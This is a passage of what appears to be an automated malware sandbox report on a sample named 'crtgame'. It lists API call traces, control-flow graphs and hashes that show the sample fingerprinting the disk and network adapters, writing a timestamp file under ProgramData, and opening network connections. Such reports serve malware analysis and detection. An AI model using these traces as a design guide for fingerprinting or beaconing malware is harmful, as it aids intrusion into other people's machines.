                                                                                    • Instruction ID: 68fdb6583d0c245446587079a1899daa6c6a2c0374c1ed045ba235f76db45796
                                                                                    • Opcode Fuzzy Hash: 545ebbd53fedba73ffcb27dc45815ba43b7da59f9014455ab6200338ebf6ec28
                                                                                    • Instruction Fuzzy Hash: 8A31A371E00219EBDB24DF95D884BAFBBB8EF84758F10416EE509A7680DB745B44CBD0

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _malloc.LIBCMT ref: 02C45C48
                                                                                      • Part of subcall function 02C529AC: __FF_MSGBANNER.LIBCMT ref: 02C529C3
                                                                                      • Part of subcall function 02C529AC: __NMSG_WRITE.LIBCMT ref: 02C529CA
                                                                                      • Part of subcall function 02C529AC: RtlAllocateHeap.NTDLL(008C0000,00000000,00000001), ref: 02C529EF
                                                                                    • _memset.LIBCMT ref: 02C45C5B
                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000023,00000000,?,?,?,00000000), ref: 02C45C68
                                                                                    • lstrcpyW.KERNEL32(C:\ProgramData\rc.dat,00000000,?,?,?,00000000), ref: 02C45C70
                                                                                    • lstrcatW.KERNEL32(C:\ProgramData\rc.dat,\ts.dat,?,?,?,00000000), ref: 02C45C7C
                                                                                    • CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,80000000,00000000,00000000,00000003,00000020,00000000,?,?,?,00000000), ref: 02C45C95
                                                                                    • ReadFile.KERNEL32(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02C45CAA
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 02C45CB1
                                                                                    • __time64.LIBCMT ref: 02C45CC5
                                                                                    • CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,40000000,00000000,00000000,00000002,00000022,00000000,?,?,?,00000000), ref: 02C45CE2
                                                                                    • WriteFile.KERNELBASE(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02C45CF7
                                                                                    • CloseHandle.KERNELBASE(00000000,?,?,?,00000000), ref: 02C45CFE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandle$AllocateFolderHeapPathReadSpecialWrite__time64_malloc_memsetlstrcatlstrcpy
                                                                                    • String ID: C:\ProgramData\rc.dat$\ts.dat
                                                                                    • API String ID: 204396691-2903805982
                                                                                    • Opcode ID: 938f4b56e104db54fdb487d9675722e8d6cb23547cb7533200438429f6d8d871
                                                                                    • Instruction ID: 07407df15ec50ebd0c0b6b04c0382874bbe7700f8ba17d191609c4e1882b20c1
                                                                                    • Opcode Fuzzy Hash: 938f4b56e104db54fdb487d9675722e8d6cb23547cb7533200438429f6d8d871
                                                                                    • Instruction Fuzzy Hash: 4C21C472940218BFE7106BA5AC8DFBFFBACDB45668F004A55F909A31C0DB705D198BB1

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1050 2c41cf8-2c41d21 CreateEventA 1051 2c41d52-2c41d69 CreateEventA 1050->1051 1052 2c41d23-2c41d4e GetLastError call 2c50510 call 2c41712 1050->1052 1053 2c41d9a-2c41dc4 call 2c52db9 1051->1053 1054 2c41d6b-2c41d96 GetLastError call 2c50510 call 2c41712 1051->1054 1052->1051 1061 2c41dc6-2c41dda GetLastError 1053->1061 1062 2c41e0d-2c41e0f 1053->1062 1054->1053 1072 2c41ddc-2c41ddd CloseHandle 1061->1072 1073 2c41ddf-2c41de7 1061->1073 1065 2c41e11-2c41e1b WaitForSingleObject CloseHandle 1062->1065 1066 2c41e1d-2c41e23 1062->1066 1065->1066 1072->1073 1074 2c41dee-2c41e08 call 2c50510 call 2c41712 1073->1074 1075 2c41de9-2c41dec CloseHandle 1073->1075 1074->1062 1075->1074
                                                                                    APIs
                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C41D11
                                                                                    • GetLastError.KERNEL32 ref: 02C41D23
                                                                                      • Part of subcall function 02C41712: __EH_prolog.LIBCMT ref: 02C41717
                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C41D59
                                                                                    • GetLastError.KERNEL32 ref: 02C41D6B
                                                                                    • __beginthreadex.LIBCMT ref: 02C41DB1
                                                                                    • GetLastError.KERNEL32 ref: 02C41DC6
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C41DDD
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C41DEC
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C41E14
                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 02C41E1B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                    • String ID: thread$thread.entry_event$thread.exit_event
                                                                                    • API String ID: 831262434-3017686385
                                                                                    • Opcode ID: b613c34c5256c1ca15dc4e21782134d102cbccfe89024965dbaf39faae41054f
                                                                                    • Instruction ID: 266ce0da4bebe1446d45e3cc3a1889f904100a01dde365b01cd4ed5c646d4c7d
                                                                                    • Opcode Fuzzy Hash: b613c34c5256c1ca15dc4e21782134d102cbccfe89024965dbaf39faae41054f
                                                                                    • Instruction Fuzzy Hash: F2318F759003119FD700EF24C888B2BBBA5EB84754F14492DF99987390DBB1D989CFE2

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1079 2c44cb1-2c44cf6 call 2c64df0 call 2c50510 RtlEnterCriticalSection RtlLeaveCriticalSection 1084 2c44cfc 1079->1084 1085 2c44fff-2c45008 1079->1085 1088 2c44d01-2c44d21 call 2c43863 call 2c44b18 1084->1088 1086 2c4500f-2c4501f 1085->1086 1087 2c4500a call 2c4380b 1085->1087 1087->1086 1093 2c44d26-2c44d2b 1088->1093 1094 2c44d31-2c44d36 1093->1094 1095 2c44fcc-2c44fd8 RtlEnterCriticalSection RtlLeaveCriticalSection 1093->1095 1096 2c44d3c-2c44d65 call 2c4c862 1094->1096 1097 2c44f99-2c44f9b 1094->1097 1098 2c44fde-2c44ff9 RtlEnterCriticalSection RtlLeaveCriticalSection 1095->1098 1096->1095 1103 2c44d6b-2c44d87 call 2c476ad 1096->1103 1097->1095 1100 2c44f9d-2c44fca call 2c4a0ae 1097->1100 1098->1085 1098->1088 1100->1095 1100->1098 1107 2c44def-2c44df3 1103->1107 1108 2c44d89-2c44db2 call 2c4c862 1103->1108 1109 2c44df5-2c44e24 call 2c4c862 1107->1109 1110 2c44db8-2c44dc4 RtlEnterCriticalSection RtlLeaveCriticalSection 1107->1110 1108->1110 1115 2c44ec3-2c44eec call 2c4c862 1108->1115 1109->1110 1120 2c44e26-2c44e57 call 2c4c862 1109->1120 1113 2c44dca-2c44dd1 RtlEnterCriticalSection RtlLeaveCriticalSection 1110->1113 1116 2c44dd7-2c44dea call 2c48315 1113->1116 1124 2c44ef2-2c44f1b call 2c4c862 1115->1124 1125 2c44f8f-2c44f94 1115->1125 1116->1098 1120->1110 1128 2c44e5d-2c44ebe call 2c4c994 call 2c48315 call 2c4808a call 2c48315 1120->1128 1124->1125 1131 2c44f1d-2c44f7b call 2c47687 call 2c4a33b call 2c4a413 call 2c48315 call 2c512f0 1124->1131 1125->1113 1128->1115 1131->1116 1148 2c44f81-2c44f8a call 2c44100 1131->1148 1148->1116
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C44CB6
                                                                                    • RtlEnterCriticalSection.NTDLL(02C773D8), ref: 02C44CE2
                                                                                    • RtlLeaveCriticalSection.NTDLL(02C773D8), ref: 02C44CEE
                                                                                      • Part of subcall function 02C44B18: __EH_prolog.LIBCMT ref: 02C44B1D
                                                                                      • Part of subcall function 02C44B18: InterlockedExchange.KERNEL32(?,00000000), ref: 02C44C1D
                                                                                    • RtlEnterCriticalSection.NTDLL(02C773D8), ref: 02C44DBE
                                                                                    • RtlLeaveCriticalSection.NTDLL(02C773D8), ref: 02C44DC4
                                                                                    • RtlEnterCriticalSection.NTDLL(02C773D8), ref: 02C44DCB
                                                                                    • RtlLeaveCriticalSection.NTDLL(02C773D8), ref: 02C44DD1
                                                                                    • RtlEnterCriticalSection.NTDLL(02C773D8), ref: 02C44FD2
                                                                                    • RtlLeaveCriticalSection.NTDLL(02C773D8), ref: 02C44FD8
                                                                                    • RtlEnterCriticalSection.NTDLL(02C773D8), ref: 02C44FE3
                                                                                    • RtlLeaveCriticalSection.NTDLL(02C773D8), ref: 02C44FEC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                    • String ID:
                                                                                    • API String ID: 2062355503-0
                                                                                    • Opcode ID: b3d7e7491d1dff1a26f05a6e102b5e7df1a3a102011af4848cd2db1c668855e5
                                                                                    • Instruction ID: f58b3e5641e2d0288e9f39526a695f99acb32b2d7605c2de55bb0ea31e1df42d
                                                                                    • Opcode Fuzzy Hash: b3d7e7491d1dff1a26f05a6e102b5e7df1a3a102011af4848cd2db1c668855e5
                                                                                    • Instruction Fuzzy Hash: 88B14C71D0025DDFEF25DF90C844BEEBBB5AF04314F24419AE809B6280DBB55A49DFA1

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1151 2c426db-2c42726 RtlEnterCriticalSection 1152 2c4277e-2c42781 1151->1152 1153 2c42728-2c42736 CreateWaitableTimerA 1151->1153 1156 2c427d5-2c427f0 RtlLeaveCriticalSection 1152->1156 1157 2c42783-2c42798 call 2c5354c 1152->1157 1154 2c42738-2c42756 GetLastError call 2c50510 call 2c41712 1153->1154 1155 2c4275b-2c42778 SetWaitableTimer 1153->1155 1154->1155 1155->1152 1163 2c427ca 1157->1163 1164 2c4279a-2c427ac call 2c5354c 1157->1164 1165 2c427cc-2c427d0 call 2c4778c 1163->1165 1169 2c427ae-2c427b7 1164->1169 1170 2c427b9 1164->1170 1165->1156 1171 2c427bb-2c427c3 call 2c41cf8 1169->1171 1170->1171 1173 2c427c8 1171->1173 1173->1165
                                                                                    APIs
                                                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 02C42706
                                                                                    • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02C4272B
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C65553), ref: 02C42738
                                                                                      • Part of subcall function 02C41712: __EH_prolog.LIBCMT ref: 02C41717
                                                                                    • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02C42778
                                                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 02C427D9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                    • String ID: timer
                                                                                    • API String ID: 4293676635-1792073242
                                                                                    • Opcode ID: f77548b8ad52f42a6465b174986c5f32a564309cce202d63ff6f1700cf6dcaeb
                                                                                    • Instruction ID: d4cfbaf42f52f61784658899665badfd065fceeee2544b0d274aa96542d5de23
                                                                                    • Opcode Fuzzy Hash: f77548b8ad52f42a6465b174986c5f32a564309cce202d63ff6f1700cf6dcaeb
                                                                                    • Instruction Fuzzy Hash: 43316FB1904745AFD310DF66C989B27BBE8FB48764F004A2EF85583A80DB70D954CFA6

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1285 2c4f1e7-2c4f23d call 2c4f29c call 2c4f3a0 GetWindowsDirectoryA 1290 2c4f23f-2c4f261 CreateFileA 1285->1290 1291 2c4f28b-2c4f29b call 2c4f14f 1285->1291 1290->1291 1292 2c4f263-2c4f27b GetFileTime CloseHandle 1290->1292 1292->1291 1294 2c4f27d-2c4f28a call 2c4f082 1292->1294 1294->1291
                                                                                    APIs
                                                                                      • Part of subcall function 02C4F29C: CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02C4F2BB
                                                                                      • Part of subcall function 02C4F29C: DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02C4F2F9
                                                                                      • Part of subcall function 02C4F29C: GetLastError.KERNEL32 ref: 02C4F35A
                                                                                      • Part of subcall function 02C4F29C: CloseHandle.KERNELBASE(?), ref: 02C4F391
                                                                                      • Part of subcall function 02C4F3A0: LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02C4F3B6
                                                                                      • Part of subcall function 02C4F3A0: GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02C4F3CF
                                                                                      • Part of subcall function 02C4F3A0: GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02C4F3F4
                                                                                      • Part of subcall function 02C4F3A0: FreeLibrary.KERNEL32(00000000), ref: 02C4F47D
                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02C4F235
                                                                                    • CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02C4F256
                                                                                    • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02C4F26A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C4F273
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandleLibrary$AdaptersAddressControlDeviceDirectoryErrorFreeInfoLastLoadProcTimeWindows
                                                                                    • String ID: tLVh
                                                                                    • API String ID: 1378705229-319918027
                                                                                    • Opcode ID: f196e466e64d7f38633873aaa77a191210b217b4123c9619761df14199c1efe5
                                                                                    • Instruction ID: e98db77a091017c3263665025e1b40b7138622c19b4b90f97f82b9b9420e33aa
                                                                                    • Opcode Fuzzy Hash: f196e466e64d7f38633873aaa77a191210b217b4123c9619761df14199c1efe5
                                                                                    • Instruction Fuzzy Hash: 38113075D4032C6BDB209BA5DC88FDEBB7DEB49714F000619E909AB184DB745A49CBD0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1298 2c429ee-2c42a06 1299 2c42ab3-2c42abb call 2c50510 1298->1299 1300 2c42a0c-2c42a10 1298->1300 1308 2c42abe-2c42ac6 1299->1308 1301 2c42a12-2c42a15 1300->1301 1302 2c42a39-2c42a4c WSASetLastError closesocket call 2c49e92 1300->1302 1301->1302 1304 2c42a17-2c42a36 call 2c50510 call 2c42f50 1301->1304 1307 2c42a51-2c42a55 1302->1307 1304->1302 1307->1299 1310 2c42a57-2c42a5f call 2c50510 1307->1310 1316 2c42a61-2c42a67 1310->1316 1317 2c42a69-2c42a71 call 2c50510 1310->1317 1316->1317 1318 2c42a7b-2c42aad ioctlsocket WSASetLastError closesocket call 2c49e92 1316->1318 1322 2c42a73-2c42a79 1317->1322 1323 2c42aaf-2c42ab1 1317->1323 1318->1323 1322->1318 1322->1323 1323->1299 1323->1308
                                                                                    APIs
                                                                                    • WSASetLastError.WS2_32(00000000,?,?,?,00000006,?,?), ref: 02C42A3B
                                                                                    • closesocket.WS2_32(?), ref: 02C42A42
                                                                                    • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02C42A89
                                                                                    • WSASetLastError.WS2_32(00000000), ref: 02C42A97
                                                                                    • closesocket.WS2_32(?), ref: 02C42A9E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLastclosesocket$ioctlsocket
                                                                                    • String ID:
                                                                                    • API String ID: 1561005644-0
                                                                                    • Opcode ID: 15d3e5ca9f58315fae3f4330db3951a9537dea10659e0e778797044b9cc1d186
                                                                                    • Instruction ID: 0c968b63da65258499bbc115203dc6f5d6af13e5b829517c7095f253f1621f97
                                                                                    • Opcode Fuzzy Hash: 15d3e5ca9f58315fae3f4330db3951a9537dea10659e0e778797044b9cc1d186
                                                                                    • Instruction Fuzzy Hash: 3E21FB71940215ABEB24ABB8884976BB7E9DF84325F104E6AFD45C3241FF70CA84C761

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1325 2c41ba7-2c41bcf call 2c64df0 RtlEnterCriticalSection 1328 2c41bd1 1325->1328 1329 2c41be9-2c41bf7 RtlLeaveCriticalSection call 2c4dcbc 1325->1329 1330 2c41bd4-2c41be0 call 2c41b79 1328->1330 1332 2c41bfa-2c41c20 RtlEnterCriticalSection 1329->1332 1337 2c41c55-2c41c6e RtlLeaveCriticalSection 1330->1337 1338 2c41be2-2c41be7 1330->1338 1334 2c41c34-2c41c36 1332->1334 1335 2c41c22-2c41c2f call 2c41b79 1334->1335 1336 2c41c38-2c41c43 1334->1336 1339 2c41c45-2c41c4b 1335->1339 1343 2c41c31 1335->1343 1336->1339 1338->1329 1338->1330 1339->1337 1342 2c41c4d-2c41c51 1339->1342 1342->1337 1343->1334
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C41BAC
                                                                                    • RtlEnterCriticalSection.NTDLL ref: 02C41BBC
                                                                                    • RtlLeaveCriticalSection.NTDLL ref: 02C41BEA
                                                                                    • RtlEnterCriticalSection.NTDLL ref: 02C41C13
                                                                                    • RtlLeaveCriticalSection.NTDLL ref: 02C41C56
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 1633115879-0
                                                                                    • Opcode ID: 20dbb76fae7386a4b6f214993e8a0b073b25a14fd30f9f8b9356f8621d71efc5
                                                                                    • Instruction ID: c86dd23bb723f8c5387486692f08569bc6cdd55f24bd3b91f7858a26b0d98506
                                                                                    • Opcode Fuzzy Hash: 20dbb76fae7386a4b6f214993e8a0b073b25a14fd30f9f8b9356f8621d71efc5
                                                                                    • Instruction Fuzzy Hash: 88219FB5900614EFCB14CF69C8887ABBBB5FF88714F148589E85997301DBB4EA45CBE0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1345 2c45d49-2c45d4d 1346 2c45d4f-2c45d58 1345->1346 1347 2c45cea-2c45d1c WriteFile CloseHandle call 2c455a8 1345->1347 1348 2c45d1f 1346->1348 1349 2c45d5a-2c45d61 1346->1349 1353 2c45d20-2c45d25 1348->1353 1351 2c45d62-2c45d65 1349->1351 1351->1353 1354 2c45d68-2c45d92 1351->1354 1356 2c45d2a-2c45d3b call 2c529ac 1353->1356 1354->1356 1357 2c45d94 1354->1357 1356->1345 1357->1351 1361 2c45d97-2c45d9d 1357->1361
                                                                                    APIs
                                                                                    • WriteFile.KERNELBASE(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02C45CF7
                                                                                    • CloseHandle.KERNELBASE(00000000,?,?,?,00000000), ref: 02C45CFE
                                                                                    • _malloc.LIBCMT ref: 02C45D2B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseFileHandleWrite_malloc
                                                                                    • String ID: idle
                                                                                    • API String ID: 1977945335-3693393173
                                                                                    • Opcode ID: b3cf98ea40a57d70bec128a821702a1d3bcdecb8df337e346e42a8b45dc56911
                                                                                    • Instruction ID: 735e0369d2f186af4f5406a8b553016f921da6bb175f41947f8397699d5a0a6d
                                                                                    • Opcode Fuzzy Hash: b3cf98ea40a57d70bec128a821702a1d3bcdecb8df337e346e42a8b45dc56911
                                                                                    • Instruction Fuzzy Hash: FB11597AA50204AFC7059A65D8899FFBBB8EF8E264B500699F504DB201DB309D06C7B2

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1362 2c42edd-2c42f1f WSASetLastError WSASocketA call 2c50510 WSAGetLastError 1365 2c42f21-2c42f25 1362->1365 1366 2c42f49-2c42f4f 1362->1366 1367 2c42f27-2c42f36 setsockopt 1365->1367 1368 2c42f3c-2c42f47 call 2c50510 1365->1368 1367->1368 1368->1366
                                                                                    APIs
                                                                                    • WSASetLastError.WS2_32(00000000,?,?,?,?,?,02C4358B,?,?,?,?,?,?,?,02C48FA9,?), ref: 02C42EEE
                                                                                    • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02C42EFD
                                                                                    • WSAGetLastError.WS2_32(?,02C4358B,?,?,?,?,?,?,?,02C48FA9,?,?,?,00000001,00000006,?), ref: 02C42F0C
                                                                                    • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02C42F36
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$Socketsetsockopt
                                                                                    • String ID:
                                                                                    • API String ID: 2093263913-0
                                                                                    • Opcode ID: ae55d94ee00073f09a1373dfdd4b2ab1338e3e4bb18a616d9104bbe15728ec69
                                                                                    • Instruction ID: 38a3e95ffa2afe1b27e561536e3446fb983041cc051982cea5c2a9946d036119
                                                                                    • Opcode Fuzzy Hash: ae55d94ee00073f09a1373dfdd4b2ab1338e3e4bb18a616d9104bbe15728ec69
                                                                                    • Instruction Fuzzy Hash: 76018871940214FBDB209F66DC88B5BBBA9EF89771F008A65FA18CB141D771C9008BA0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1371 2c42db5-2c42dc8 1372 2c42de4-2c42de8 1371->1372 1373 2c42dca-2c42dd2 call 2c50510 1371->1373 1375 2c42dfc-2c42e07 call 2c42d39 1372->1375 1376 2c42dea-2c42ded 1372->1376 1380 2c42dd8 1373->1380 1382 2c42e0c-2c42e11 1375->1382 1376->1375 1378 2c42def-2c42dfa call 2c50510 1376->1378 1378->1380 1385 2c42ddb 1380->1385 1383 2c42e13 1382->1383 1384 2c42ddd-2c42de3 1382->1384 1387 2c42e16-2c42e18 1383->1387 1385->1384 1387->1385 1388 2c42e1a-2c42e35 call 2c50510 call 2c4166f 1387->1388 1393 2c42e54-2c42e97 WSASetLastError select call 2c49e92 1388->1393 1394 2c42e37-2c42e52 call 2c50510 call 2c4166f 1388->1394 1400 2c42ea6 1393->1400 1401 2c42e99-2c42ea4 call 2c50510 1393->1401 1394->1385 1394->1393 1403 2c42eb6-2c42eb8 1400->1403 1404 2c42ea8-2c42eb3 call 2c50510 1400->1404 1408 2c42ebe-2c42ed2 call 2c42d39 1401->1408 1403->1385 1403->1408 1404->1403 1408->1387 1412 2c42ed8 1408->1412 1412->1384
                                                                                    APIs
                                                                                      • Part of subcall function 02C42D39: WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02C43390,00000001,?,00000000,?,?,?,?,?), ref: 02C42D47
                                                                                      • Part of subcall function 02C42D39: WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02C42D5C
                                                                                    • WSASetLastError.WS2_32(00000000,00000000,?,?), ref: 02C42E6D
                                                                                    • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02C42E83
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$Sendselect
                                                                                    • String ID: 3'
                                                                                    • API String ID: 2958345159-280543908
                                                                                    • Opcode ID: bf4274450cc0b702334fc10bac28594f01b888e5e8bd5adce5a19946f1484592
                                                                                    • Instruction ID: 947a21e32e01d431ad491772c60f41209d0c05fc7c241ca66f489e1067571d27
                                                                                    • Opcode Fuzzy Hash: bf4274450cc0b702334fc10bac28594f01b888e5e8bd5adce5a19946f1484592
                                                                                    • Instruction Fuzzy Hash: 3431ADB0A102199BDB10DFA0C8067EF7BAAAF48314F00495AEC44D7280EBB1D595DFA6

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1413 2c42ac7-2c42ad6 1414 2c42ae8-2c42b02 WSASetLastError connect call 2c49e92 1413->1414 1415 2c42ad8-2c42ae6 call 2c50510 1413->1415 1419 2c42b07-2c42b09 1414->1419 1420 2c42b13 1415->1420 1421 2c42b16-2c42b31 call 2c50510 call 2c4166f 1419->1421 1422 2c42b0b-2c42b10 call 2c50510 1419->1422 1420->1421 1429 2c42b50-2c42b5b call 2c43027 1421->1429 1430 2c42b33-2c42b4e call 2c50510 call 2c4166f 1421->1430 1422->1420 1436 2c42b5d-2c42b80 call 2c42fb4 1429->1436 1437 2c42b8f-2c42b94 1429->1437 1430->1429 1430->1437 1436->1437 1441 2c42b82-2c42b8c call 2c50510 1436->1441 1441->1437
                                                                                    APIs
                                                                                    • WSASetLastError.WS2_32(00000000,?,?), ref: 02C42AEA
                                                                                    • connect.WS2_32(00000010,?,?), ref: 02C42AF5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLastconnect
                                                                                    • String ID: 3'
                                                                                    • API String ID: 374722065-280543908
                                                                                    • Opcode ID: b4c35e10fae2b666a457a4ceb43cead26231b7049122eb05c7bfce4e155aa8f6
                                                                                    • Instruction ID: 71afb0bc1131c89c54f0ac460c29662999d0630e81977915a619845fbf804e37
                                                                                    • Opcode Fuzzy Hash: b4c35e10fae2b666a457a4ceb43cead26231b7049122eb05c7bfce4e155aa8f6
                                                                                    • Instruction Fuzzy Hash: 5621DB70E00218ABDF14EFB4C4046AFBBBAEF84324F504599EC5993380EFB49A459F95

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1444 2c4353e-2c43555 call 2c64df0 1447 2c43576-2c4359c call 2c42edd 1444->1447 1448 2c43557-2c43571 call 2c41996 1444->1448 1454 2c435ad-2c435c3 CreateIoCompletionPort 1447->1454 1455 2c4359e-2c435a8 1447->1455 1453 2c43688-2c43697 1448->1453 1457 2c435c5-2c435d9 GetLastError call 2c50510 1454->1457 1458 2c435db-2c435e2 call 2c50510 1454->1458 1456 2c43684 1455->1456 1461 2c43687 1456->1461 1464 2c435e4-2c435ed 1457->1464 1458->1464 1461->1453 1465 2c43626-2c43630 1464->1465 1466 2c435ef-2c43624 call 2c50510 call 2c429ee 1464->1466 1468 2c43640 1465->1468 1469 2c43632-2c43633 1465->1469 1466->1461 1470 2c43644-2c4366a call 2c4d87f 1468->1470 1472 2c43635-2c43638 1469->1472 1473 2c4363a-2c4363e 1469->1473 1478 2c43671-2c43681 call 2c50510 1470->1478 1479 2c4366c call 2c4143f 1470->1479 1472->1470 1473->1470 1478->1456 1479->1478
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
